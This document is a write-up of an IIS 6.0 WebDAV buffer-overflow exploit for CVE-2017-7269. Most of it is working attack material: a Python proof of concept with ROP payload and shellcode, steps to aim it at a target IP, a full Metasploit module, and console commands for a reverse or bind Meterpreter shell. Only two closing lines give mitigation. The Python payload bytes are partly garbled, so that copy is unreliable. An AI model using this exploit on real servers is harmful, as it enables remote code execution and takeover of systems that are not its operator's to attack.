IIS6.0 Remote Command Execution Vulnerability (CVE-2017-7269)

Vulnerability information

Vulnerability ID: CVE-2017-7269
Discoverers: Zhiniang Peng and Chen Wu (Information Security Laboratory, South China University of Technology, School of Computer Science and Engineering)
Vulnerability brief: IIS 6.0 with WebDAV service enabled was exploded with a cache overflow vulnerability, resulting in remote code It is currently available for stable exploitation against Windows Server 2003 R2, and the vulnerability was exploited in the wild as early as July and August 2016.
Vulnerability type: Buffer overflow
Vulnerability level: High risk
Affected product: Microsoft Windows Server 2003 R2 IIS6.0 with WebDAV service enabled (currently verified, other versions have not been verified)
Trigger function: ScStoragePathFromUrl function
Additional information: ScStoragePathFromUrl function is called twice
Vulnerability details: There is a buffer overflow vulnerability in the ScStoragePathFromUrl function of the WebDAV service of IIS6.0 in Windows Server 2003. An attacker executes arbitrary code through a PROPFIND request with a long header beginning with "If: <Http://".

Conditions of use

iis6.0
Enable the WebDav function (specifically the PROPFIND method, if successful, it will return 207 or 200)
windows server 2003 R2

Little

20

 
     #------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous. 
    
     #written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China 
    
     #-----------Email: [email protected] 
    
      import socket 
    
      sock = socket.socket (socket.AF_INET, socket.SOCK_STREAM) 
    
      sock.connect(( 
     '127.0.0.1'
     ,80)) 
    
      pay= 
     'PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n' 
    
      pay+= 
     'If: <http://localhost/aaaaaaa' 
    
      pay+= 
     '\ xe6 \ xbd \ xa8 \ xe7 \ xa1 \ xa3 \ xe7 \ x9d \ xa1 \ xe7 \ x84 \ xb3 \ xe6 \ xa4 \ xb6 \ xe4 \ x9d \ xb2 \ xe7 \ xa8 \ xb9 \ xe4 \ xad \ xb7 \ xe4 \ xbd \ xb0 \ xe7 \ x95 \ x93 \ xe7 \ xa9 \ x8f \ xe4 \ xa1 \ xa8 \ xe5 \ x99 \ xa3 \ xe6 \ xb5 \ x94 \ xe6 \ xa1 \ x85 \ xe3 \ xa5 \ x93 \ xe5 \ x81 \ xac \ xe5 \ x95 \ xa7 \ xe6 \ x6d \ xa3 \ xe3 \ x8d \ xa4 \ xe4 \ x98 \ xb0 \ xe7 \ xa1 \ x85 \ xe6 \ xa5 \ x92 \ xe5 \ x90 \ xb1 \ xe4 \ xb1 \ x98 \ xe6 \ xa9 \ x91 \ xe7 \ x89 \ x81 \ xe4 \ x88 \ xb1 \ xe7 \ x80 \ xb5 \ xe5 \ xa1 \ x90 \ xe3 \ x99 \ xa4 \ xe6 \ xb1 \ x87 \ xe3 \ x94 \ xb9 \ xe5 \ x91 \ xaa \ xe5 \ x80 \ xb4 \ xe5 \ x91 \ x83 \ xe7 \ x9d \ x92 \ xe5 \ x81 \ xa1 \ xe3 \ x88 \ xb2 \ xe6 \ xb5 \ x8b \ xe6 \ xb0 \ xb4 \ xe3 \ x89 \ x87 \ xe6 \ x89 \ x81 \ xe3 \ x9d \ x8d \ xe5 \ x85 \ xa1 \ xe5 \ xa1 \ xa2 \ xe4 \ x9d \ xb3 \ xe5 \ x89 \ x90 \ xe3 \ x99 \ xb0 \ xe7 \ x95 \ x84 \ xe6 \ xa1 \ xaa \ xe3 \ x8d \ xb4 \ xe4 \ xb9 \ x8a \ xe7 \ xa1 \ xab \ xe4 \ xa5 \ xb6 \ xe4 \ xb9 \ xb3 \ xe4 \ xb1 \ xaa \ xe5 \ x9d \ xba \ xe6 \ xbd \ xb1 \ xe5 \ xa1 \ x8a \ xe3 \ x88 \ xb0 \ xe3 \ x9d \ xae \ xe4 \ xad \ x89 \ xe5 \ x89 \ x8d \ xe4 \ xa1 \ xa3 \ xe6 \ xbd \ x8c \ xe7 \ x95 \ x96 \ xe7 \ x95 \ xb5 \ xe6 \ x99 \ xaf \ xe7 \ x99 \ xa8 \ xe4 \ x91 \ x8d \ xe5 \ x81\ xb0 \ xe7 \ xa8 \ xb6 \ xe6 \ x89 \ x8b \ xe6 \ x95 \ x97 \ xe7 \ x95 \ x90 \ xe6 \ xa9 \ xb2 \ xe7 \ xa9 \ xab \ xe7 \ x9d \ xa2 \ xe7 \ x99 \ x98 \ xe6 \ x89 \ x88 \ xe6 \ x94 \ xb1 \ xe3 \ x81 \ x94 \ xe6 \ xb1 \ xb9 \ xe5 \ x81 \ x8a \ xe5 \ x91 \ xa2 \ xe5 \ x80 \ xb3 \ xe3 \ x95 \ xb7 \ xe6 \ xa9 \ xb7 \ xe4 \ x85 \ x84 \ xe3 \ x8c \ xb4 \ xe6 \ x91 \ xb6 \ xe4 \ xb5 \ x86 \ xe5 \ x99 \ x94 \ xe4 \ x9d \ xac \ xe6 \ x95 \ x83 \ xe7 \ x98 \ xb2 \ xe7 \ x89 \ xb8 \ xe5 \ x9d \ xa9 \ xe4 \ x8c \ xb8 \ xe6 \ x89 \ xb2 \ xe5 \ xa8 \ xb0 \ xe5 \ xa4 \ xb8 \ xe5 \ x91 \ x88 \ xc8 \ x82 \ xc8 \ x82 \ xe1 \ x8b \ x80 \ xe6 \ xa0 \ x83 \ xe6 \ xb1 \ x84 \ xe5 \ x89 \ x96 \ xe4 \ xac \ xb7 \ xe6 \ xb1 \ xad \ xe4 \ xbd \ x98 \ xe5 \ xa1 \ x9a \ xe7 \ xa5 \ x90 \ xe4 \ xa5 \ xaa \ xe5 \ xa1 \ x8f \ xe4 \ xa9 \ x92 \ xe4 \ x85 \ x90 \ xe6 \ x99 \ x8d \ xe1 \ x8f \ x80 \ xe6 \ xa0 \ x83 \ xe4 \ xa0 \ xb4 \ xe6 \ x94 \ xb1 \ xe6 \ xbd \ x83 \ xe6 \ xb9 \ xa6 \ xe7 \ x91 \ x81 \ xe4 \ x8d \ xac \ xe1 \ x8f \ x80 \ xe6 \ xa0 \ x83 \ xe5 \ x8d \ x83 \ xe6 \ xa9 \ x81 \ xe7 \ x81 \ x92 \ xe3 \ x8c \ xb0 \ xe5 \ xa1 \ xa6 \ xe4 \ x89 \ x8c \ xe7 \ x81 \ x8b \ xe6 \ x8d \ x86 \ xe5 \ x85 \ xb3 \ xe7 \ xa5 \ x81 \ xe7 \ xa9 \ x90 \ xe4 \ xa9 \ xac ' 
    
      pay+= 
     '>' 
    
      pay+= 
     ' (Not <locktoken:write1>) <http://localhost/bbbbbbb' 
    
      pay+= 
     '\ xe7 \ xa5 \ x88 \ xe6 \ x85 \ xb5 \ xe4 \ xbd \ x83 \ xe6 \ xbd \ xa7 \ xe6 \ limit \ haf \ xe4 \ xa1 \ x85 \ xe3 \ x99 \ x86 \ xe6 \ x9d \ xb5 \ xe4 \ x90 \ xb3 \ xe3 \ xa1 \ xb1 \ xe5 \ x9d \ xa5 \ xe5 \ xa9 \ xa2 \ xe5 \ x90 \ xb5 \ xe5 \ x99 \ xa1 \ xe6 \ xa5 \ x92 \ xe6 \ xa9 \ x93 \ xe5 \ x85 \ x97 \ xe3 \ xa1 \ x8e \ xe5 \ xa5 \ x88 \ xe6 \ x8d \ x95 \ xe4 \ xa5 \ xb1 \ xe4 \ x8d \ xa4 \ xe6 \ x91 \ xb2 \ xe3 \ x91 \ xa8 \ xe4 \ x9d \ x98 \ xe7 \ x85 \ xb9 \ xe3 \ x8d \ xab \ xe6 \ limit \ x95 \ xe6 \ xb5 \ x88 \ xe5 \ x81 \ x8f \ xe7 \ xa9 \ x86 \ xe3 \ x91 \ xb1 \ xe6 \ xbd \ x94 \ xe7 \ x91 \ x83 \ xe5 \ xa5 \ x96 \ xe6 \ xbd \ haf \ xe7 \ x8d \ x81 \ xe3 \ x91 \ x97 \ xe6 \ x85 \ xa8 \ xe7 \ xa9 \ xb2 \ xe3 \ x9d \ x85 \ xe4 \ xb5 \ x89 \ xe5 \ x9d \ x8e \ xe5 \ x91 \ x88 \ xe4 \ xb0 \ xb8 \ xe3 \ x99 \ xba \ xe3 \ x95 \ xb2 \ xe6 \ x89 \ xa6 \ xe6 \ xb9 \ x83 \ xe4 \ xa1 \ limit \ xe3 \ x95 \ x88 \ xe6 \ x85 \ xb7 \ xe4 \ xb5 \ x9a \ xe6 \ x85 \ xb4 \ xe4 \ x84 \ xb3 \ xe4 \ x8d \ xa5 \ xe5 \ x89 \ xb2 \ xe6 \ xb5 \ xa9 \ xe3 \ x99 \ xb1 \ xe4 \ xb9 \ xa4 \ xe6 \ xb8 \ xb9 \ xe6 \ x8d \ x93 \ xe6 \ limit \ xa4 \ xe5 \ x85 \ x86 \ xe4 \ xbc \ xb0 \ xe7 \ xa1 \ haf \ xe7 \ x89 \ x93 \ xe6 \ x9d \ x90 \ xe4 \ x95 \ x93 \ xe7 \ xa9 \ xa3 \ xe7 \ x84 \ xb9 \ xe4 \ xbd\ x93 \ xe4 \ x91 \ x96 \ xe6 \ xbc \ xb6 \ xe7 \ x8d \ xb9 \ xe6 \ xa1 \ xb7 \ xe7 \ xa9 \ x96 \ xe6 \ x85 \ x8a \ xe3 \ xa5 \ x85 \ xe3 \ x98 \ xb9 \ xe6 \ xb0 \ xb9 \ xe4 \ x94 \ xb1 \ xe3 \ x91 \ xb2 \ xe5 \ x8d \ xa5 \ xe5 \ xa1 \ x8a \ xe4 \ x91 \ x8e \ xe7 \ xa9 \ x84 \ xe6 \ xb0 \ xb5 \ xe5 \ xa9 \ x96 \ xe6 \ x89 \ x81 \ xe6 \ xb9 \ xb2 \ xe6 \ x98 \ xb1 \ xe5 \ xa5 \ x99 \ xe5 \ x90 \ xb3 \ xe3 \ x85 \ x82 \ xe5 \ xa1 \ xa5 \ xe5 \ xa5 \ x81 \ xe7 \ x85 \ x90 \ xe3 \ x80 \ xb6 \ xe5 \ x9d \ xb7 \ xe4 \ x91 \ x97 \ xe5 \ x8d \ xa1 \ xe1 \ x8f \ x80 \ xe6 \ xa0 \ x83 \ xe6 \ xb9 \ x8f \ xe6 \ xa0 \ x80 \ xe6 \ xb9 \ x8f \ xe6 \ xa0 \ x80 \ xe4 \ x89 \ x87 \ xe7 \ x99 \ xaa \ xe1 \ x8f \ x80 \ xe6 \ xa0 \ x83 \ xe4 \ x89 \ x97 \ xe4 \ xbd \ xb4 \ xe5 \ xa5 \ x87 \ xe5 \ x88 \ xb4 \ xe4 \ xad \ xa6 \ xe4 \ xad \ x82 \ xe7 \ x91 \ xa4 \ xe7 \ xa1 \ xaf \ xe6 \ x82 \ x82 \ xe6 \ xa0 \ x81 \ xe5 \ x84 \ xb5 \ xe7 \ x89 \ xba \ xe7 \ x91 \ xba \ xe4 \ xb5 \ x87 \ xe4 \ x91 \ x99 \ xe5 \ x9d \ x97 \ xeb \ x84 \ x93 \ xe6 \ xa0 \ x80 \ xe3 \ x85 \ xb6 \ xe6 \ xb9 \ xaf \ xe2 \ x93 \ xa3 \ xe6 \ xa0 \ x81 \ xe1 \ x91 \ xa0 \ xe6 \ xa0 \ x83 \ xcc \ x80 \ xe7 \ xbf \ xbe \ xef \ xbf \ xbf \ xef \ xbf \ xbf \ xe1 \ x8f \ x80 \ xe6 \ xa0 \ x83 \ xd1 \ xae \ xe6 \ xa0 \ x83\ xe7 \ x85 \ xae \ xe7 \ x91 \ xb0 \ xe1 \ x90 \ xb4 \ xe6 \ xa0 \ x83 \ xe2 \ xa7 \ xa7 \ xe6 \ xa0 \ x81 \ xe9 \ x8e \ x91 \ xe6 \ xa0 \ x80 \ xe3 \ xa4 \ xb1 \ xe6 \ x99 \ xae \ xe4 \ xa5 \ x95 \ xe3 \ x81 \ x92 \ xe5 \ x91 \ xab \ xe7 \ x99 \ xab \ xe7 \ x89 \ x8a \ xe7 \ xa5 \ xa1 \ xe1 \ x90 \ x9c \ xe6 \ xa0 \ x83 \ xe6 \ xb8 \ x85 \ xe6 \ xa0 \ x80 \ xe7 \ x9c \ xb2 \ xe7 \ xa5 \ xa8 \ xe4 \ xb5 \ xa9 \ xe3 \ x99 \ xac \ xe4 \ x91 \ xa8 \ xe4 \ xb5 \ xb0 \ xe8 \ x89 \ x86 \ xe6 \ xa0 \ x80 \ xe4 \ xa1 \ xb7 \ xe3 \ x89 \ x93 \ xe1 \ xb6 \ xaa \ xe6 \ xa0 \ x82 \ xe6 \ xbd \ xaa \ xe4 \ x8c \ xb5 \ xe1 \ x8f \ xb8 \ xe6 \ xa0 \ x83 \ xe2 \ xa7 \ xa7 \ xe6 \ xa0 \ x81 ' 
    
      shellcode= 
     'VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O02LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA' 
    
      pay+=shellcode 
    
      pay+= 
     '>\r\n\r\n' 
    
     print
      pay 
    
      sock.send(pay) 
    
      data = sock.recv(80960) 
    
     print
      data 
    
      sock.close

poc from: https://github.com/edwardz246003/IIS_exploit/blob/master/exploit.py

Modify the code sock.connect(('127.0.0.1',80)), change the ip address to the target website ip, run the py file, and a calc process (calculator) will be generated on the target server.

Exp

The above poc is only used to verify whether this vulnerability exists, but it needs to be checked on the logged in server to determine the process. After the processing of foreign Daniel, I wrote a ruby script that uses msf to bounce the shell.

75

      require 
     'msf/core' 
    
      class MetasploitModule < Msf::Exploit::Remote 
    
      Rank = GoodRanking 
    
      include Msf::Exploit::Remote::Tcp 
    
      def initialize(info = {}) 
    
      super(update_info(info, 
    
     'Name' => 
     'CVE-2017-7269 Microsoft IIS WebDav ScStoragePathFromUrl Overflow', 
    
     'Description' => %q{ 
    
      Buffer overflow 
     in the ScStoragePathFromUrl 
     function 
     in the WebDAV service 
     in Internet Information Services (IIS) 6.0 
     in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with 
     "If: <http://" 
     in a PROPFIND request, as exploited 
     in the wild 
     in July or August 2016. 
    
      Original exploit by Zhiniang Peng and Chen Wu. 
    
      }, 
    
     'Author' => [ 
     'Dominic Chell <[email protected]>' ], 
    
     'License' => MSF_LICENSE, 
    
     'References' => 
    
      [ 
    
      [ 
     'CVE', 
     'CVE-2017-7269'], 
    
      [ 
     'BID', 
     '97127'], 
    
      [ 
     'URL', 
     'https://github.com/edwardz246003/IIS_exploit'], 
    
      ], 
    
     'Privileged' => 
     false, 
    
     'Payload' => 
    
      { 
    
     'Space' => 2000, 
    
     'BadChars' => 
     "\x00", 
    
     'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed, 
    
     'DisableNops' => 
     'True', 
    
     'EncoderOptions' => 
    
      { 
    
     'BufferRegister' => 
     'ESI', 
    
      } 
    
      }, 
    
     'DefaultOptions' => 
    
      { 
    
     'EXITFUNC' => 
     'process', 
    
     'PrependMigrate' => 
     true, 
    
     'PrependMigrateProc' => 
     "calc" 
    
      }, 
    
     'Targets' => 
    
      [ 
    
      [ 
    
     'Microsoft Windows Server 2003 R2', 
    
      { 
    
     'Platform' => 
     'win', 
    
      }, 
    
      ], 
    
      ], 
    
     'Platform' => 
     'win', 
    
     'DisclosureDate' => 
     'March 26 2017', 
    
     'DefaultTarget' => 0)) 
    
      register_options( 
    
      [ 
    
      Opt::RPORT(80) 
    
      ], self.class) 
    
      end 
    
      def exploit 
    
      connect 
    
      buf1 = 
     "If: <http://localhost/aaaaaaa" 
    
      buf1 << 
     "\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac" 
    
      buf1 << 
     ">" 
    
      buf1 << 
     " (Not <locktoken:write1>) <http://localhost/bbbbbbb" 
    
      buf1 << 
     "\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81" 
    
      buf1 << payload.encoded 
    
      sock.put( 
     "PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n#{buf1}>\r\n\r\n") 
    
      handler 
    
      disconnect 
    
      end

github地址：https://github.com/dmchell/metasploit-framework/pull/1/commits/9e8ec532a260b1a3f03abd09efcc44c30e4491c2

Usage

　　新建一个文件,如：cve-2017-7269.rb，将以上代码复制进去（或者直接下载该文件）。
　　找到metasploit安装目录，将cve-2017-7269.rb文件放到opt/metasploit/apps/pro/msf3/modules/exploit/windows/iis/目录下。（我在mac上试的，目录有所不同，放在这个目录下是为了方便分类管理）。

运行msfconsole并加载cve-2017-7269模块

      >use exploit/windows/iis/cvce-2017-7269 
    
      > 
     set RHOST 192.168.4.244 
     #设置目标IP 
    
      >exploit

　　运行exploit，会在本机监听4444端口，存在漏洞的目标服务器会连上本机的4444端口，反弹一个meterpreter。（前提是目标服务器能够ping通本机）

通过meterpreter执行shell命令，反弹cmdshell

　　此模块默认会加载reverse_tcp payload，用于让目标服务器远程连接本地的某个端口，当然我们也可以改变payload，将其改为bind_tcp，用于让目标服务器监听一个端口，本地主动连接弹出shell。

1	> set PAYLOAD windows/meterpreter/bind_tcp

改完之后，再次测试

　　运行exploit，目标服务器监听4444端口，本机会连上目标的4444端口，反弹一个meterpreter。（前提是本机能够ping通目标服务器）

在msf模块中输入set，可查看能够修改的项目，比show options要全一点。

临时解决办法

关闭WebDAV服务
使用相关防护设备